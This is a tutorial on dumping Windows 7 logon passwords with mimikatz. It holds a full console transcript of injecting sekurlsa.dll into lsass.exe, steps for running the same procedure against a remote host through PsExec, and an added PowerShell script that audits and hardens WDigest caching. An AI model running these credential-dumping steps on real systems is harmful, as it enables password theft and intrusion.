Use mimikatz to obtain the Windows 7 password
Mimikatz:
http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
blog.gentilkiwi.com is the tool author's blog; it is written in French, which is why the program output below is French as well.
Obtaining the Windows 7 Administrator password with mimikatz (the tool is run from a shell started through PsExec, so that the process token is not UAC-filtered; the sekurlsa.dll is then injected into lsass.exe):
Microsoft Windows [version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>cd C:\mimikatz_trunk\tools

C:\mimikatz_trunk\tools>psexec.exe \\127.0.0.1 cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\mimikatz_trunk\Win32

C:\mimikatz_trunk\Win32>mimikatz.exe
mimikatz 1.0 x86 (alpha)    /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'activation du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords
Authentification Id         : 0;395889
Package d'authentification  :
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ hash omitted }, ntlm{ hash omitted }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;155584
Package d'authentification  :
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;75419
Package d'authentification  :
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ hash omitted }, ntlm{ hash omitted }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;40847
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

mimikatz # exit
Fermeture du canal de communication

C:\mimikatz_trunk\Win32>
The cleartext password is the value shown next to wdigest (and, for interactive sessions, tspkg). In the output above, the Administrator logon sessions on WIN-S1J6267VPKL show "wdigest : yang", so the Windows 7 Administrator password on my test machine is yang. The msv1_0 line of the same session carries the LM and NTLM hashes, and sessions that print "n.t. (LUID KO)" simply have no credential of that type cached. Note that this works on Windows 7 because the WDigest security package keeps a reversibly stored copy of the logon password in LSASS by default; once KB2871997 is installed and UseLogonCredential is set to 0 (or on Windows 8.1 / Server 2012 R2 and later, where that is the default), the wdigest field is empty and only the hashes remain. For reference, the French lines mean: "Demande d'activation du privilège" = privilege activation request, "Attente de connexion du client" = waiting for the client to connect, "Serveur connecté à un client" = server connected to a client, "Fermeture du canal de communication" = closing the communication channel.
Blog of the tool author: http://blog.gentilkiwi.com/mimikatz
Explanation of the mimikatz commands used:
privilege::debug // enables SeDebugPrivilege for the mimikatz process, which is what allows it to open lsass.exe; it is not a privilege escalation by itself, the shell must already be an administrator (here started through PsExec so it is not UAC-filtered)
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" // inject the sekurlsa DLL into lsass.exe. Use the absolute path! The path must not contain Chinese characters (spaces are allowed).
@getLogonPasswords // called inside the injected module: dump the credentials of every logon session
exit // exit cleanly. Do not use Ctrl+C: it leaves the communication channel open and mimikatz.exe spins in an endless loop at 100% CPU.
In addition, I tested this on Windows 7 itself. You can also run the same procedure from a Windows XP machine against the Windows 7 host: only the PsExec target needs to change, for example:
psexec.exe \\192.168.1.123 cmd.exe
Replace 192.168.1.123 with the IP address of the target. PsExec needs administrator credentials on the target and access to its ADMIN$ share (pass them with -u and -p if the current account is not valid there); the mimikatz files must then be present on the target's disk, since the inject::process path is interpreted there.
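The technique above depends entirely on WDigest keeping a cleartext copy of the logon password in LSASS. The following PowerShell script is an added example, not part of the original post or of mimikatz; it tells you whether a given host would still expose a password in the wdigest field, and can switch the caching off. It assumes an elevated PowerShell 3.0 or later session, that Get-HotFix can see installed updates, and the documented behaviour of KB2871997: on Windows 7/8/2008 R2/2012 the UseLogonCredential value only matters once that update is present, while on Windows 8.1/2012 R2 and later cleartext is cached only when the value is explicitly 1.

```powershell
# Added example, not from the original post: audit (and optionally harden) WDigest
# cleartext caching, the behaviour that puts the password in mimikatz' "wdigest" field.
# Assumptions: elevated session, PowerShell 3.0+, Get-HotFix sees installed updates.

function Test-WDigestCleartext {
    param([switch]$Harden)   # -Harden sets UseLogonCredential=0 when caching is on

    $wdigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # OS version from WMI/CIM (reliable even when .NET reports a compatibility version).
    $os = [version](Get-CimInstance -ClassName Win32_OperatingSystem).Version

    # Current UseLogonCredential value, or $null when the value does not exist.
    $prop = Get-ItemProperty -Path $wdigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue
    $useLogonCredential = if ($prop) { $prop.UseLogonCredential } else { $null }

    # 6.3 = Windows 8.1 / Server 2012 R2; everything from there on has the safe default.
    $newerThanWin8 = ($os.Major -gt 6) -or ($os.Major -eq 6 -and $os.Minor -ge 3)
    $hasKb2871997  = [bool](Get-HotFix -Id KB2871997 -ErrorAction SilentlyContinue)

    if ($newerThanWin8) {
        # Cleartext only if somebody explicitly re-enabled it.
        $cachesCleartext = ($useLogonCredential -eq 1)
    } elseif ($hasKb2871997) {
        # Update present: caching stays on until the value is explicitly 0.
        $cachesCleartext = ($useLogonCredential -ne 0)
    } else {
        # Windows 7 without KB2871997: the value is ignored, cleartext is always cached.
        $cachesCleartext = $true
    }

    "OS version          : $os"
    "KB2871997 installed : $hasKb2871997"
    "UseLogonCredential  : $(if ($null -eq $useLogonCredential) { '<not set>' } else { $useLogonCredential })"
    "WDigest cleartext   : $(if ($cachesCleartext) { 'CACHED in LSASS (wdigest field would show the password)' } else { 'not cached' })"

    if ($Harden -and $cachesCleartext) {
        if (-not $newerThanWin8 -and -not $hasKb2871997) {
            Write-Warning 'KB2871997 is not installed; UseLogonCredential=0 has no effect until it is.'
        }
        if (-not (Test-Path $wdigestKey)) { New-Item -Path $wdigestKey -Force | Out-Null }
        Set-ItemProperty -Path $wdigestKey -Name UseLogonCredential -Value 0 -Type DWord
        # Only logon sessions created after the change are affected; credentials already
        # held in LSASS stay there until those users log off, so reboot to be sure.
        'UseLogonCredential set to 0; reboot (or log off every session) for it to take full effect.'
    }
}

# Usage: report only, then harden.
Test-WDigestCleartext
Test-WDigestCleartext -Harden
```

Run the report first on a machine you have already dumped with mimikatz: a Windows 7 box without KB2871997 will report "CACHED" regardless of the registry, which matches the wdigest : yang line in the transcript above. After hardening and a reboot the same dump still shows the msv1_0 hashes, so the change stops cleartext recovery but not pass-the-hash.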